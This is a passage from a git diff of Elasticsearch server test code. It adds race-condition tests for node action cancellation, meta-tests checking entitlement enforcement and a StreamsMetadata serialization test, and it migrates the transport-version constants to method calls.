assertThat(phase.numReducePhases(), greaterThanOrEqualTo(1)); + assertThat(phase.totalHits().value(), equalTo(2L)); + } + } + } diff --git a/server/src/test/java/org/elasticsearch/action/search/TransportSearchActionTests.java b/server/src/test/java/org/elasticsearch/action/search/TransportSearchActionTests.java index 4346351c1576c..ab6e39239e6e8 100644 --- a/server/src/test/java/org/elasticsearch/action/search/TransportSearchActionTests.java +++ b/server/src/test/java/org/elasticsearch/action/search/TransportSearchActionTests.java @@ -14,7 +14,6 @@ import org.apache.lucene.search.TotalHits; import org.apache.lucene.util.SetOnce; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.ActionListener; import org.elasticsearch.action.LatchedActionListener; import org.elasticsearch.action.MockResolvedIndices; @@ -1737,7 +1736,7 @@ public void testCCSCompatibilityCheck() throws Exception { .build(); ActionFilters actionFilters = mock(ActionFilters.class); when(actionFilters.filters()).thenReturn(new ActionFilter[0]); - TransportVersion transportVersion = TransportVersionUtils.getNextVersion(TransportVersions.MINIMUM_CCS_VERSION, true); + TransportVersion transportVersion = TransportVersionUtils.getNextVersion(TransportVersion.minimumCCSVersion(), true); ThreadPool threadPool = new ThreadPool(settings, MeterRegistry.NOOP, new DefaultBuiltInExecutorBuilders()); try { TransportService transportService = MockTransportService.createNewService( diff --git a/server/src/test/java/org/elasticsearch/action/support/nodes/TransportNodesActionTests.java b/server/src/test/java/org/elasticsearch/action/support/nodes/TransportNodesActionTests.java index f954019d5556d..d62432c2ee4cd 100644 --- a/server/src/test/java/org/elasticsearch/action/support/nodes/TransportNodesActionTests.java +++ b/server/src/test/java/org/elasticsearch/action/support/nodes/TransportNodesActionTests.java @@ -10,6 +10,7 @@ package org.elasticsearch.action.support.nodes; import org.elasticsearch.ElasticsearchException; +import org.elasticsearch.ExceptionsHelper; import org.elasticsearch.action.ActionListener; import org.elasticsearch.action.FailedNodeException; import org.elasticsearch.action.support.ActionFilters; @@ -57,6 +58,8 @@ import java.util.List; import java.util.Map; import java.util.Set; +import java.util.concurrent.CountDownLatch; +import java.util.concurrent.CyclicBarrier; import java.util.concurrent.Executor; import java.util.concurrent.TimeUnit; import java.util.concurrent.atomic.AtomicInteger; @@ -66,7 +69,9 @@ import static java.util.Collections.emptyMap; import static org.elasticsearch.test.ClusterServiceUtils.createClusterService; import static org.elasticsearch.test.ClusterServiceUtils.setState; +import static org.hamcrest.Matchers.containsString; import static org.hamcrest.Matchers.greaterThan; +import static org.hamcrest.Matchers.hasSize; import static org.mockito.Mockito.mock; public class TransportNodesActionTests extends ESTestCase { @@ -316,6 +321,137 @@ protected Object createActionContext(Task task, TestNodesRequest request) { assertTrue(cancellableTask.isCancelled()); // keep task alive } + public void testCompletionShouldNotBeInterferedByCancellationAfterProcessingBegins() throws Exception { + final var barrier = new CyclicBarrier(2); + final var action = new TestTransportNodesAction( + clusterService, + transportService, + new ActionFilters(Set.of()), + TestNodeRequest::new, + THREAD_POOL.executor(ThreadPool.Names.GENERIC) + ) { + @Override + protected void newResponseAsync( + Task task, + TestNodesRequest request, + Void unused, + List testNodeResponses, + List failures, + ActionListener listener + ) { + boolean waited = false; + // Process node responses in a loop and ensure no ConcurrentModificationException will be thrown due to + // concurrent cancellation coming after the loop has started, see also #128852 + for (var response : testNodeResponses) { + if (waited == false) { + waited = true; + safeAwait(barrier); + safeAwait(barrier); + } + } + super.newResponseAsync(task, request, unused, testNodeResponses, failures, listener); + } + }; + + final CancellableTask cancellableTask = new CancellableTask(randomLong(), "transport", "action", "", null, emptyMap()); + final var cancelledFuture = new PlainActionFuture(); + cancellableTask.addListener(() -> cancelledFuture.onResponse(null)); + + final PlainActionFuture future = new PlainActionFuture<>(); + action.execute(cancellableTask, new TestNodesRequest(), future); + + for (var capturedRequest : transport.getCapturedRequestsAndClear()) { + completeOneRequest(capturedRequest); + } + + // Wait for the overall response to start processing the node responses in a loop and then cancel the task. + // The cancellation should not interfere with the node response processing. + safeAwait(barrier); + TaskCancelHelper.cancel(cancellableTask, "simulated"); + safeGet(cancelledFuture); + + // Let the process continue, and it should be successful + safeAwait(barrier); + assertResponseReleased(safeGet(future)); + } + + public void testConcurrentlyCompletionAndCancellation() throws InterruptedException { + final var action = getTestTransportNodesAction(); + + final CountDownLatch onCancelledLatch = new CountDownLatch(1); + final CancellableTask cancellableTask = new CancellableTask(randomLong(), "transport", "action", "", null, emptyMap()) { + @Override + protected void onCancelled() { + onCancelledLatch.countDown(); + } + }; + + final PlainActionFuture future = new PlainActionFuture<>(); + action.execute(cancellableTask, new TestNodesRequest(), future); + + final List nodeResponses = new ArrayList<>(); + final CapturingTransport.CapturedRequest[] capturedRequests = transport.getCapturedRequestsAndClear(); + for (int i = 0; i < capturedRequests.length - 1; i++) { + final var capturedRequest = capturedRequests[i]; + nodeResponses.add(completeOneRequest(capturedRequest)); + } + + final var raceBarrier = new CyclicBarrier(3); + final Thread completeThread = new Thread(() -> { + safeAwait(raceBarrier); + nodeResponses.add(completeOneRequest(capturedRequests[capturedRequests.length - 1])); + }); + final Thread cancelThread = new Thread(() -> { + safeAwait(raceBarrier); + TaskCancelHelper.cancel(cancellableTask, "simulated"); + }); + completeThread.start(); + cancelThread.start(); + safeAwait(raceBarrier); + + // We expect either a successful response or a cancellation exception. All node responses should be released in both cases. + try { + final var testNodesResponse = future.actionGet(SAFE_AWAIT_TIMEOUT); + assertThat(testNodesResponse.getNodes(), hasSize(capturedRequests.length)); + assertResponseReleased(testNodesResponse); + } catch (Exception e) { + final var taskCancelledException = (TaskCancelledException) ExceptionsHelper.unwrap(e, TaskCancelledException.class); + assertNotNull("expect task cancellation exception, but got\n" + ExceptionsHelper.stackTrace(e), taskCancelledException); + assertThat(e.getMessage(), containsString("task cancelled [simulated]")); + assertTrue(cancellableTask.isCancelled()); + safeAwait(onCancelledLatch); // wait for the latch, the listener for releasing node responses is called before it + assertTrue(nodeResponses.stream().allMatch(r -> r.hasReferences() == false)); + } + + completeThread.join(10_000); + cancelThread.join(10_000); + assertFalse(completeThread.isAlive()); + assertFalse(cancelThread.isAlive()); + } + + private void assertResponseReleased(TestNodesResponse response) { + final var allResponsesReleasedListener = new SubscribableListener(); + try (var listeners = new RefCountingListener(allResponsesReleasedListener)) { + response.addCloseListener(listeners.acquire()); + for (final var nodeResponse : response.getNodes()) { + nodeResponse.addCloseListener(listeners.acquire()); + } + } + safeAwait(allResponsesReleasedListener); + assertTrue(response.getNodes().stream().noneMatch(TestNodeResponse::hasReferences)); + assertFalse(response.hasReferences()); + } + + private TestNodeResponse completeOneRequest(CapturingTransport.CapturedRequest capturedRequest) { + final var response = new TestNodeResponse(capturedRequest.node()); + try { + transport.getTransportResponseHandler(capturedRequest.requestId()).handleResponse(response); + } finally { + response.decRef(); + } + return response; + } + @BeforeClass public static void startThreadPool() { THREAD_POOL = new TestThreadPool(TransportNodesActionTests.class.getSimpleName()); diff --git a/server/src/test/java/org/elasticsearch/bootstrap/EntitlementMetaTests.java b/server/src/test/java/org/elasticsearch/bootstrap/EntitlementMetaTests.java new file mode 100644 index 0000000000000..2ea51461fb528 --- /dev/null +++ b/server/src/test/java/org/elasticsearch/bootstrap/EntitlementMetaTests.java @@ -0,0 +1,57 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.bootstrap; + +import org.elasticsearch.core.SuppressForbidden; +import org.elasticsearch.entitlement.bootstrap.TestEntitlementBootstrap; +import org.elasticsearch.test.ESTestCase; + +import java.io.IOException; +import java.nio.file.Path; + +/** + * Ensures that unit tests are subject to entitlement checks. + * This is a "meta test" because it tests that the tests are working: + * if these tests fail, it means other tests won't be correctly detecting + * entitlement enforcement errors. + *

+ * It may seem strange to have this test where it is, rather than in the entitlement library. + * There's a reason for that. + *

+ * To exercise entitlement enforcement, we must attempt an operation that should be denied. + * This necessitates some operation that fails the entitlement check, + * and it must be in production code (or else we'd also need {@link WithEntitlementsOnTestCode}, + * and we don't want to require that here). + * Naturally, there are very few candidates, because most code doesn't fail entitlement checks: + * really just the entitlement self-test we do at startup. Hence, that's what we use here. + *

+ * Since we want to call the self-test, which is in the server, we can't call it + * from a place like the entitlement library tests, because those deliberately do not + * have a dependency on the server code. Hence, this test lives here in the server tests. + * + * @see WithoutEntitlementsMetaTests + * @see WithEntitlementsOnTestCodeMetaTests + */ +public class EntitlementMetaTests extends ESTestCase { + public void testSelfTestPasses() { + assumeTrue("Not yet working in serverless", TestEntitlementBootstrap.isEnabledForTests()); + Elasticsearch.entitlementSelfTest(); + } + + /** + * Unless {@link WithEntitlementsOnTestCode} is specified, sensitive methods can + * be called from test code. + */ + @SuppressForbidden(reason = "Testing that a forbidden API is allowed under these circumstances") + public void testForbiddenActionAllowedInTestCode() throws IOException { + // If entitlements were enforced, this would throw. + Path.of(".").toRealPath(); + } +} diff --git a/server/src/test/java/org/elasticsearch/bootstrap/WithEntitlementsOnTestCodeMetaTests.java b/server/src/test/java/org/elasticsearch/bootstrap/WithEntitlementsOnTestCodeMetaTests.java new file mode 100644 index 0000000000000..a91a2b5d4aeca --- /dev/null +++ b/server/src/test/java/org/elasticsearch/bootstrap/WithEntitlementsOnTestCodeMetaTests.java @@ -0,0 +1,42 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.bootstrap; + +import org.elasticsearch.core.SuppressForbidden; +import org.elasticsearch.entitlement.bootstrap.TestEntitlementBootstrap; +import org.elasticsearch.entitlement.runtime.api.NotEntitledException; +import org.elasticsearch.test.ESTestCase; +import org.elasticsearch.test.ESTestCase.WithEntitlementsOnTestCode; + +import java.nio.file.Path; + +/** + * A version of {@link EntitlementMetaTests} that tests {@link WithEntitlementsOnTestCode}. + * + * @see EntitlementMetaTests + * @see WithoutEntitlementsMetaTests + */ +@WithEntitlementsOnTestCode +public class WithEntitlementsOnTestCodeMetaTests extends ESTestCase { + /** + * {@link WithEntitlementsOnTestCode} should not affect this, since the sensitive method + * is called from server code. The self-test should pass as usual. + */ + public void testSelfTestPasses() { + assumeTrue("Not yet working in serverless", TestEntitlementBootstrap.isEnabledForTests()); + Elasticsearch.entitlementSelfTest(); + } + + @SuppressForbidden(reason = "Testing that a forbidden API is disallowed") + public void testForbiddenActionDenied() { + assumeTrue("Not yet working in serverless", TestEntitlementBootstrap.isEnabledForTests()); + assertThrows(NotEntitledException.class, () -> Path.of(".").toRealPath()); + } +} diff --git a/server/src/test/java/org/elasticsearch/bootstrap/WithoutEntitlementsMetaTests.java b/server/src/test/java/org/elasticsearch/bootstrap/WithoutEntitlementsMetaTests.java new file mode 100644 index 0000000000000..8ec9116a97ab8 --- /dev/null +++ b/server/src/test/java/org/elasticsearch/bootstrap/WithoutEntitlementsMetaTests.java @@ -0,0 +1,43 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.bootstrap; + +import org.elasticsearch.core.SuppressForbidden; +import org.elasticsearch.test.ESTestCase; +import org.elasticsearch.test.ESTestCase.WithoutEntitlements; + +import java.io.IOException; +import java.nio.file.Path; + +/** + * A version of {@link EntitlementMetaTests} that tests {@link WithoutEntitlements}. + * + * @see EntitlementMetaTests + * @see WithEntitlementsOnTestCodeMetaTests + */ +@WithoutEntitlements +public class WithoutEntitlementsMetaTests extends ESTestCase { + /** + * Without enforcement of entitlements, {@link Elasticsearch#entitlementSelfTest} will fail and throw. + */ + public void testSelfTestFails() { + assertThrows(IllegalStateException.class, Elasticsearch::entitlementSelfTest); + } + + /** + * A forbidden action called from test code should be allowed, + * with or without {@link WithoutEntitlements}. + */ + @SuppressForbidden(reason = "Testing that a forbidden API is allowed under these circumstances") + public void testForbiddenActionAllowed() throws IOException { + // If entitlements were enforced, this would throw + Path.of(".").toRealPath(); + } +} diff --git a/server/src/test/java/org/elasticsearch/cli/TerminalTests.java b/server/src/test/java/org/elasticsearch/cli/TerminalTests.java index 812e2375bf172..d9542111afdca 100644 --- a/server/src/test/java/org/elasticsearch/cli/TerminalTests.java +++ b/server/src/test/java/org/elasticsearch/cli/TerminalTests.java @@ -10,12 +10,14 @@ package org.elasticsearch.cli; import org.elasticsearch.test.ESTestCase; +import org.elasticsearch.test.ESTestCase.WithoutEntitlements; import java.io.StringReader; import static org.elasticsearch.cli.Terminal.readLineToCharArray; import static org.hamcrest.Matchers.equalTo; +@WithoutEntitlements // test & cli only - never running with entitlements enabled public class TerminalTests extends ESTestCase { public void testVerbosity() throws Exception { diff --git a/server/src/test/java/org/elasticsearch/cluster/ClusterStateTests.java b/server/src/test/java/org/elasticsearch/cluster/ClusterStateTests.java index 9d9a3c17e286d..1968e1151b479 100644 --- a/server/src/test/java/org/elasticsearch/cluster/ClusterStateTests.java +++ b/server/src/test/java/org/elasticsearch/cluster/ClusterStateTests.java @@ -9,7 +9,6 @@ package org.elasticsearch.cluster; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.Version; import org.elasticsearch.action.admin.indices.rollover.RolloverInfo; import org.elasticsearch.cluster.block.ClusterBlock; @@ -2053,7 +2052,7 @@ private static void writeChunks(ClusterState clusterState, XContentBuilder build } public void testGetMinTransportVersion() throws IOException { - assertEquals(TransportVersions.MINIMUM_COMPATIBLE, ClusterState.EMPTY_STATE.getMinTransportVersion()); + assertEquals(TransportVersion.minimumCompatible(), ClusterState.EMPTY_STATE.getMinTransportVersion()); var builder = ClusterState.builder(buildClusterState()); int numNodes = randomIntBetween(2, 20); @@ -2069,7 +2068,7 @@ public void testGetMinTransportVersion() throws IOException { assertThat(newState.getMinTransportVersion(), equalTo(minVersion)); assertEquals( - TransportVersions.MINIMUM_COMPATIBLE, + TransportVersion.minimumCompatible(), ClusterState.builder(newState) .blocks(ClusterBlocks.builder().addGlobalBlock(GatewayService.STATE_NOT_RECOVERED_BLOCK)) .build() diff --git a/server/src/test/java/org/elasticsearch/cluster/coordination/CoordinatorTests.java b/server/src/test/java/org/elasticsearch/cluster/coordination/CoordinatorTests.java index cb4aae41924dd..a495b39bdee14 100644 --- a/server/src/test/java/org/elasticsearch/cluster/coordination/CoordinatorTests.java +++ b/server/src/test/java/org/elasticsearch/cluster/coordination/CoordinatorTests.java @@ -12,7 +12,6 @@ import org.apache.logging.log4j.core.LogEvent; import org.elasticsearch.ElasticsearchException; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.cluster.AbstractNamedDiffable; import org.elasticsearch.cluster.ClusterState; import org.elasticsearch.cluster.SimpleDiffable; @@ -1590,7 +1589,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/server/src/test/java/org/elasticsearch/cluster/coordination/ElasticsearchNodeCommandTests.java b/server/src/test/java/org/elasticsearch/cluster/coordination/ElasticsearchNodeCommandTests.java index c2cf7adacf01d..1680d436ba647 100644 --- a/server/src/test/java/org/elasticsearch/cluster/coordination/ElasticsearchNodeCommandTests.java +++ b/server/src/test/java/org/elasticsearch/cluster/coordination/ElasticsearchNodeCommandTests.java @@ -28,6 +28,7 @@ import org.elasticsearch.index.Index; import org.elasticsearch.indices.IndicesModule; import org.elasticsearch.test.ESTestCase; +import org.elasticsearch.test.ESTestCase.WithoutEntitlements; import org.elasticsearch.test.TestClusterCustomMetadata; import org.elasticsearch.test.TestProjectCustomMetadata; import org.elasticsearch.xcontent.NamedXContentRegistry; @@ -46,6 +47,7 @@ import static org.hamcrest.Matchers.instanceOf; import static org.hamcrest.Matchers.not; +@WithoutEntitlements // commands don't run with entitlements enforced public class ElasticsearchNodeCommandTests extends ESTestCase { public void testLoadStateWithoutMissingCustomsButPreserved() throws IOException { diff --git a/server/src/test/java/org/elasticsearch/cluster/coordination/JoinHelperTests.java b/server/src/test/java/org/elasticsearch/cluster/coordination/JoinHelperTests.java index 6672815c8dbcd..4179a6d3958ea 100644 --- a/server/src/test/java/org/elasticsearch/cluster/coordination/JoinHelperTests.java +++ b/server/src/test/java/org/elasticsearch/cluster/coordination/JoinHelperTests.java @@ -28,7 +28,6 @@ import org.elasticsearch.indices.breaker.NoneCircuitBreakerService; import org.elasticsearch.monitor.StatusInfo; import org.elasticsearch.tasks.TaskManager; -import org.elasticsearch.telemetry.tracing.Tracer; import org.elasticsearch.test.ESTestCase; import org.elasticsearch.test.MockLog; import org.elasticsearch.test.junit.annotations.TestLogging; @@ -74,8 +73,7 @@ public void testJoinDeduplication() { x -> localNode, clusterSettings, new ClusterConnectionManager(Settings.EMPTY, capturingTransport, threadPool.getThreadContext()), - taskManger, - Tracer.NOOP + taskManger ); JoinHelper joinHelper = new JoinHelper( null, @@ -241,8 +239,7 @@ public void testJoinFailureOnUnhealthyNodes() { x -> localNode, clusterSettings, new ClusterConnectionManager(Settings.EMPTY, capturingTransport, threadPool.getThreadContext()), - taskManger, - Tracer.NOOP + taskManger ); AtomicReference nodeHealthServiceStatus = new AtomicReference<>(new StatusInfo(UNHEALTHY, "unhealthy-info")); JoinHelper joinHelper = new JoinHelper( @@ -319,8 +316,7 @@ public void testLatestStoredStateFailure() { x -> localNode, clusterSettings, new ClusterConnectionManager(Settings.EMPTY, capturingTransport, threadPool.getThreadContext()), - taskManger, - Tracer.NOOP + taskManger ); JoinHelper joinHelper = new JoinHelper( null, diff --git a/server/src/test/java/org/elasticsearch/cluster/coordination/PublicationTransportHandlerTests.java b/server/src/test/java/org/elasticsearch/cluster/coordination/PublicationTransportHandlerTests.java index 94146071773a4..e60d7caaccbc4 100644 --- a/server/src/test/java/org/elasticsearch/cluster/coordination/PublicationTransportHandlerTests.java +++ b/server/src/test/java/org/elasticsearch/cluster/coordination/PublicationTransportHandlerTests.java @@ -11,7 +11,6 @@ import org.elasticsearch.ElasticsearchException; import org.elasticsearch.ExceptionsHelper; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.Version; import org.elasticsearch.action.ActionListener; import org.elasticsearch.cluster.ClusterState; @@ -236,7 +235,7 @@ public RecyclerBytesStreamOutput newNetworkBytesStream() { allNodes.add(node); nodeTransports.put( node, - TransportVersionUtils.randomVersionBetween(random(), TransportVersions.MINIMUM_COMPATIBLE, TransportVersion.current()) + TransportVersionUtils.randomVersionBetween(random(), TransportVersion.minimumCompatible(), TransportVersion.current()) ); } diff --git a/server/src/test/java/org/elasticsearch/cluster/metadata/IndexAbstractionTests.java b/server/src/test/java/org/elasticsearch/cluster/metadata/IndexAbstractionTests.java index e847273cd660a..268c9065fe7ea 100644 --- a/server/src/test/java/org/elasticsearch/cluster/metadata/IndexAbstractionTests.java +++ b/server/src/test/java/org/elasticsearch/cluster/metadata/IndexAbstractionTests.java @@ -201,13 +201,18 @@ private IndexMetadata newIndexMetadata(String indexName, AliasMetadata aliasMeta private static DataStream newDataStreamInstance(List backingIndices, List failureStoreIndices) { boolean isSystem = randomBoolean(); + boolean isReplicated = randomBoolean(); return DataStream.builder(randomAlphaOfLength(50), backingIndices) - .setFailureIndices(DataStream.DataStreamIndices.failureIndicesBuilder(failureStoreIndices).build()) + .setFailureIndices( + DataStream.DataStreamIndices.failureIndicesBuilder(failureStoreIndices) + .setRolloverOnWrite(isReplicated == false && failureStoreIndices.isEmpty()) + .build() + ) .setGeneration(randomLongBetween(1, 1000)) .setMetadata(Map.of()) .setSystem(isSystem) .setHidden(isSystem || randomBoolean()) - .setReplicated(randomBoolean()) + .setReplicated(isReplicated) .build(); } } diff --git a/server/src/test/java/org/elasticsearch/cluster/metadata/MetadataRepositoriesMetadataTests.java b/server/src/test/java/org/elasticsearch/cluster/metadata/MetadataRepositoriesMetadataTests.java index 5bf619e964e0b..db501f740b64f 100644 --- a/server/src/test/java/org/elasticsearch/cluster/metadata/MetadataRepositoriesMetadataTests.java +++ b/server/src/test/java/org/elasticsearch/cluster/metadata/MetadataRepositoriesMetadataTests.java @@ -348,7 +348,7 @@ public EnumSet context() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.MINIMUM_COMPATIBLE; + return TransportVersion.minimumCompatible(); } @Override diff --git a/server/src/test/java/org/elasticsearch/cluster/metadata/ProjectMetadataTests.java b/server/src/test/java/org/elasticsearch/cluster/metadata/ProjectMetadataTests.java index c39b5caeebce1..3f33f7824275c 100644 --- a/server/src/test/java/org/elasticsearch/cluster/metadata/ProjectMetadataTests.java +++ b/server/src/test/java/org/elasticsearch/cluster/metadata/ProjectMetadataTests.java @@ -286,7 +286,7 @@ public void testToXContent() throws IOException { "system": false, "allow_custom_routing": false, "settings" : { }, - "failure_rollover_on_write": false, + "failure_rollover_on_write": true, "rollover_on_write": false } }, @@ -553,7 +553,7 @@ public void testToXContentMultiProject() throws IOException { "system": false, "allow_custom_routing": false, "settings" : { }, - "failure_rollover_on_write": false, + "failure_rollover_on_write": true, "rollover_on_write": false } }, diff --git a/server/src/test/java/org/elasticsearch/cluster/metadata/StreamsMetadataTests.java b/server/src/test/java/org/elasticsearch/cluster/metadata/StreamsMetadataTests.java new file mode 100644 index 0000000000000..033814048a36c --- /dev/null +++ b/server/src/test/java/org/elasticsearch/cluster/metadata/StreamsMetadataTests.java @@ -0,0 +1,38 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.cluster.metadata; + +import org.elasticsearch.common.io.stream.Writeable; +import org.elasticsearch.test.AbstractChunkedSerializingTestCase; +import org.elasticsearch.xcontent.XContentParser; + +import java.io.IOException; + +public class StreamsMetadataTests extends AbstractChunkedSerializingTestCase { + @Override + protected StreamsMetadata doParseInstance(XContentParser parser) throws IOException { + return StreamsMetadata.fromXContent(parser); + } + + @Override + protected Writeable.Reader instanceReader() { + return StreamsMetadata::new; + } + + @Override + protected StreamsMetadata createTestInstance() { + return new StreamsMetadata(randomBoolean()); + } + + @Override + protected StreamsMetadata mutateInstance(StreamsMetadata instance) throws IOException { + return new StreamsMetadata(instance.logsEnabled == false); + } +} diff --git a/server/src/test/java/org/elasticsearch/cluster/serialization/ClusterSerializationTests.java b/server/src/test/java/org/elasticsearch/cluster/serialization/ClusterSerializationTests.java index 52a2f391f1fb0..ae1357a4bca2c 100644 --- a/server/src/test/java/org/elasticsearch/cluster/serialization/ClusterSerializationTests.java +++ b/server/src/test/java/org/elasticsearch/cluster/serialization/ClusterSerializationTests.java @@ -172,7 +172,7 @@ public void testRoutingTableSerialization() throws Exception { public void testSnapshotDeletionsInProgressSerialization() throws Exception { TransportVersion version = TransportVersionUtils.randomVersionBetween( random(), - TransportVersions.MINIMUM_COMPATIBLE, + TransportVersion.minimumCompatible(), TransportVersion.current() ); @@ -412,7 +412,7 @@ public static NamedDiff readDiffFrom(StreamInput in) throws IOException @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.MINIMUM_COMPATIBLE; + return TransportVersion.minimumCompatible(); } } @@ -451,7 +451,7 @@ public void testCustomSerialization() throws Exception { // serialize with minimum compatibile version outStream = new BytesStreamOutput(); - version = TransportVersions.MINIMUM_COMPATIBLE; + version = TransportVersion.minimumCompatible(); outStream.setTransportVersion(version); diffs.writeTo(outStream); inStream = outStream.bytes().streamInput(); diff --git a/server/src/test/java/org/elasticsearch/cluster/version/CompatibilityVersionsTests.java b/server/src/test/java/org/elasticsearch/cluster/version/CompatibilityVersionsTests.java index 3704c0df7678e..8647887b625e6 100644 --- a/server/src/test/java/org/elasticsearch/cluster/version/CompatibilityVersionsTests.java +++ b/server/src/test/java/org/elasticsearch/cluster/version/CompatibilityVersionsTests.java @@ -10,7 +10,6 @@ package org.elasticsearch.cluster.version; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.indices.SystemIndexDescriptor; import org.elasticsearch.test.ESTestCase; import org.elasticsearch.test.TransportVersionUtils; @@ -28,12 +27,12 @@ public class CompatibilityVersionsTests extends ESTestCase { public void testEmptyVersionsList() { assertThat( CompatibilityVersions.minimumVersions(List.of()), - equalTo(new CompatibilityVersions(TransportVersions.MINIMUM_COMPATIBLE, Map.of())) + equalTo(new CompatibilityVersions(TransportVersion.minimumCompatible(), Map.of())) ); } public void testMinimumTransportVersions() { - TransportVersion version1 = TransportVersionUtils.getNextVersion(TransportVersions.MINIMUM_COMPATIBLE, true); + TransportVersion version1 = TransportVersionUtils.getNextVersion(TransportVersion.minimumCompatible(), true); TransportVersion version2 = TransportVersionUtils.randomVersionBetween( random(), TransportVersionUtils.getNextVersion(version1, true), @@ -80,7 +79,7 @@ public void testMinimumMappingsVersions() { * complaint. */ public void testMinimumsAreMerged() { - TransportVersion version1 = TransportVersionUtils.getNextVersion(TransportVersions.MINIMUM_COMPATIBLE, true); + TransportVersion version1 = TransportVersionUtils.getNextVersion(TransportVersion.minimumCompatible(), true); TransportVersion version2 = TransportVersionUtils.randomVersionBetween( random(), TransportVersionUtils.getNextVersion(version1, true), diff --git a/server/src/test/java/org/elasticsearch/common/io/stream/DelayableWriteableTests.java b/server/src/test/java/org/elasticsearch/common/io/stream/DelayableWriteableTests.java index 3c8fa14267524..5603ddf647db1 100644 --- a/server/src/test/java/org/elasticsearch/common/io/stream/DelayableWriteableTests.java +++ b/server/src/test/java/org/elasticsearch/common/io/stream/DelayableWriteableTests.java @@ -10,7 +10,6 @@ package org.elasticsearch.common.io.stream; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.test.ESTestCase; import org.elasticsearch.test.TransportVersionUtils; @@ -205,7 +204,7 @@ protected NamedWriteableRegistry writableRegistry() { private static TransportVersion randomOldVersion() { return TransportVersionUtils.randomVersionBetween( random(), - TransportVersions.MINIMUM_COMPATIBLE, + TransportVersion.minimumCompatible(), TransportVersionUtils.getPreviousVersion(TransportVersion.current()) ); } diff --git a/server/src/test/java/org/elasticsearch/common/io/stream/VersionCheckingStreamOutputTests.java b/server/src/test/java/org/elasticsearch/common/io/stream/VersionCheckingStreamOutputTests.java index 38485e9e8c2e9..6117025f74982 100644 --- a/server/src/test/java/org/elasticsearch/common/io/stream/VersionCheckingStreamOutputTests.java +++ b/server/src/test/java/org/elasticsearch/common/io/stream/VersionCheckingStreamOutputTests.java @@ -10,7 +10,6 @@ package org.elasticsearch.common.io.stream; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.index.query.QueryBuilders; import org.elasticsearch.test.ESTestCase; import org.elasticsearch.test.TransportVersionUtils; @@ -38,7 +37,7 @@ public TransportVersion getMinimalSupportedVersion() { public void testCheckVersionCompatibility() throws IOException { TransportVersion streamVersion = TransportVersionUtils.randomVersionBetween( random(), - TransportVersions.MINIMUM_COMPATIBLE, + TransportVersion.minimumCompatible(), TransportVersionUtils.getPreviousVersion(TransportVersion.current()) ); try (VersionCheckingStreamOutput out = new VersionCheckingStreamOutput(streamVersion)) { diff --git a/server/src/test/java/org/elasticsearch/common/settings/ScopedSettingsTests.java b/server/src/test/java/org/elasticsearch/common/settings/ScopedSettingsTests.java index 47026fe713c5c..253abcf93dace 100644 --- a/server/src/test/java/org/elasticsearch/common/settings/ScopedSettingsTests.java +++ b/server/src/test/java/org/elasticsearch/common/settings/ScopedSettingsTests.java @@ -20,6 +20,7 @@ import org.elasticsearch.index.IndexModule; import org.elasticsearch.index.IndexVersion; import org.elasticsearch.test.ESTestCase; +import org.elasticsearch.test.ESTestCase.WithoutEntitlements; import org.elasticsearch.transport.TransportSettings; import org.mockito.Mockito; @@ -48,6 +49,7 @@ import static org.mockito.Mockito.verify; import static org.mockito.Mockito.verifyNoMoreInteractions; +@WithoutEntitlements // Entitlement logging interferes public class ScopedSettingsTests extends ESTestCase { public void testResetSetting() { diff --git a/server/src/test/java/org/elasticsearch/common/util/ResultTests.java b/server/src/test/java/org/elasticsearch/common/util/ResultTests.java new file mode 100644 index 0000000000000..cfb489b6224c6 --- /dev/null +++ b/server/src/test/java/org/elasticsearch/common/util/ResultTests.java @@ -0,0 +1,47 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.common.util; + +import org.elasticsearch.ElasticsearchException; +import org.elasticsearch.ElasticsearchStatusException; +import org.elasticsearch.rest.RestStatus; +import org.elasticsearch.test.ESTestCase; + +import static org.elasticsearch.test.hamcrest.OptionalMatchers.isEmpty; +import static 